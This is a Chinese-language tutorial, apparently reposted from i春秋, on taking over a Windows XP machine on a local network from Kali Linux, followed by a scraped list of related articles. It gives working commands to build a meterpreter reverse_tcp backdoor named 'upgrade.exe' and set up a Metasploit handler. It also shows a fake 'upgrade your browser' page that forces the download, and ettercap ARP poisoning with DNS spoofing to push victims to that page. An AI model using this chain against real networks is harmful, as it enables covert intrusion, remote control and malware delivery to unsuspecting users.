kali渗透windowsXP过程
文章来源i春秋
这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图
更多我之前做过的案例https://bbs.ichunqiu.com/thread-23056-1-1.html
<ignore_js_op>
这个被框住的IP就是我的目标192.16它8.1.117接下来输入nmap –sC 192.168.1.117这句语句的意思是探测主机类型以及其它信息(nmap非常强大,要多利用)
<ignore_js_op>
当然这个目标主机我打过补丁了一些漏洞无法利用例如非常流行的MS08-067这个漏洞,好吧不水了上肉戏,接下来就要玩DNS欺骗了不过提前我们要先做个后门程序很简单用一道命令就可以msfVENOM -p windows/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f exe > /var/www/html/upgrade.exe IP你可以换成自己的,不过可能被杀,你可以直接手动免杀一下,免杀我就不讲了
<ignore_js_op>
在终端输入msfconsole启动Metasploit如图
<ignore_js_op>
再依次输入以下语句
use exploit/multi/handler
set LHOST 192.168.1.116
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
show options
exploit
这些语句的意思是设置自己的ip和端口查看配置启动exploit然后等待程序运行我懒得一个个表明大致说一下就行,接下来就是DNS欺骗了首先找到这个路经etc/ettercap/修改这个文件etter.dns
<ignore_js_op>
红框圈住的地方是我添加的我的IP地址,你们可以学着我添加不过要是自己主机的IP才可以,修改完后保存一下,然后在转到这个目录/var/www/html/修改这个文件index.html代码如下
|
01
02
03
04
05
06
07
08
09
10
11
12
13
14
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><title>请下载进行升级浏览器</title></head><body><script language="javascript">window.onload = function(){window.location.href="upgrade.exe";}</script></body></html> |
当然你可愿意自己写一些其它的,不过我一般喜欢这种,修改之后再把我们刚开始生产的后门复制到这个目录下/var/www/html/转到终端输入/etc/init.d/apache2 start启动apache2服务器(意思就是把本机当作服务器)接下来转到终端输入ettercap –G进入ettercap图形化界面
<ignore_js_op>
<ignore_js_op>
点解unified sniffing选择网卡点确定 接下来按顺序点scan for hosts和Hosts list扫描和列出主机
<ignore_js_op>
<ignore_js_op>
接下来我这里的网关是192.18.1.1我点击一下网关地址再点击Add to target 1然后再点击我要攻击的地址在选择Add to target 2
<ignore_js_op>
接下来选择mitm中的arp poisoning选项它会弹出一个窗口你直接选择第一个点确定
然后在选择选项跳到这个页面我们玩的是欺骗所以双击dns_spoof
<ignore_js_op>
再然后我们就选择strat中的start sniffing选项开始DNS欺骗
然后目标主机只要打开网站就会有这种情况,不管访问任何网站
<ignore_js_op>
接下来对方下载文件运行一下就会启发我们的后门
<ignore_js_op>
<ignore_js_op>

kali渗透windowsXP过程的更多相关文章
- kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail
kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...
- kali linux 安装过程
kali linux 安装过程 获取镜像文件 首先需要去官网获取kali linux的镜像文件,本来获取了kali的最新版,由于有些方面还没有得到完善,与VM还没有完全兼容,所以换了视频上的1.0.8 ...
- kali渗透综合靶机(一)--Lazysysadmin靶机
kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...
- kali渗透综合靶机(十八)--FourAndSix2靶机
kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...
- kali渗透综合靶机(十七)--HackInOS靶机
kali渗透综合靶机(十七)--HackInOS靶机 靶机下载地址:https://www.vulnhub.com/hackinos/HackInOS.ova 一.主机发现 1.netdiscover ...
- kali渗透综合靶机(十六)--evilscience靶机
kali渗透综合靶机(十六)--evilscience靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --ra ...
- kali渗透综合靶机(十五)--Breach-1.0靶机
kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...
- kali渗透综合靶机(十四)--g0rmint靶机
kali渗透综合靶机(十四)--g0rmint靶机 靶机下载地址:https://www.vulnhub.com/entry/g0rmint-1,214/ 一.主机发现 1.netdiscover - ...
- kali渗透综合靶机(十三)--Dina 1.0靶机
kali渗透综合靶机(十三)--Dina 1.0靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate= ...
随机推荐
- Java执行shell遇到的各种问题
1.判断子进程是否执行结束 有的时候我们用java调用shell之后,之后的操作要在Process子进程正常执行结束的情况下才可以继续,所以我们需要判断Process进程什么时候终止. Process ...
- 富文本编辑器summerNote
载入富文本: $('.summernote').summernote({ height: 220, tabsize: 2, lang: 'zh-CN' }); 富文本获取内容: $('.summern ...
- 【Noip模拟 20160929】树林
题目描述 现在有一片树林,小B很想知道,最少需要多少步能围绕树林走一圈,最后回到起点.他能上下左右走,也能走对角线格子. 土地被分成RR行CC列1≤R≤50,1≤C≤501≤R≤50,1≤C≤50,下 ...
- Python oracle乱码问题
Python使用cx_oracle连接oracle查询汉字时出现乱码 解决方式: import os os.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHIN ...
- jmeter 的安装与配置
环境配置: 操作系统:win10 JDK:1.8 jmeter:5.0 jmeter 是 java 程序.所以要运行 jmeter 需要先安装配置 jdk. 1.安装配置 jdk 官方网站下载 jdk ...
- YAML基本语法
正如YAML所表示的YAML Ain’t Markup Language,YAML /ˈjæməl/ 是一种简洁的非标记语言.YAML以数据为中心,使用空白,缩进,分行组织数据,从而使得表示更加简洁易 ...
- Xshell 6安装与使用教程
随着xshell5出现评估期已过的问题,发现好多人不知道怎么下载免费版的Xshell,在这里我将详细告诉大家如何下载和安装最新的Xshell6远程管理工具. Xshell安装 1.进入xshell英文 ...
- position:fix相对父元素定位
大家都知道,当position的值为fix时,生成绝对定位的元素,相对于浏览器窗口进行定位. 它常常应用的场合是,当下拉滚动条时固定导航栏到顶部,将广告固定在页面两侧或浏览器中间. 如果需要将导航栏d ...
- 深入理解Jvm 虚拟机
参考: 内存模型:https://blog.csdn.net/qq_34280276/article/details/52783096 类加载原理:https://nomico271.github.i ...
- 【Django】关于上传图片遇到的问题
今天测试上传图片的时候,发现一只报错说找不到文件:FileNotFoundError 通过检查路径的输出,发现首先在settings配置路径的时候有问题 MEDIA_ROOT=os.path.join ...